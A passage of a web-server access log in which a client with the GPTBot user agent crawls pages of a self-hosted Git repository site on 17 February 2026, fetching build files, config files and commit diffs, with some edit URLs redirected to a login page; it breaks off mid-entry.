"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21028] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11309] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10703] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10702] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10702] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10701] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11311] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21318] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11031] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11241] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21349] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11282] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11312] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11037] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21348] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 13106] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog?display=rendered" [Client 74.7.227.38] [Length 84665] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:16:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 11022] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 10076] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:16:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12732] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_price_log.csv" [Client 74.7.227.38] [Length 25190] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:16:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 23783] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:16:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 25722] [Gzip 5.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 29991] [Gzip 8.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-2_access.log" [Client 74.7.227.38] [Length 22834] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-1_error.log" [Client 74.7.227.38] [Length 23911] [Gzip 6.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-3_error.log" [Client 74.7.227.38] [Length 20312] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 48158] [Gzip 17.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:16:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:16:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build" +[17/Feb/2026:16:16:06 +0000] - 200 200 - GET 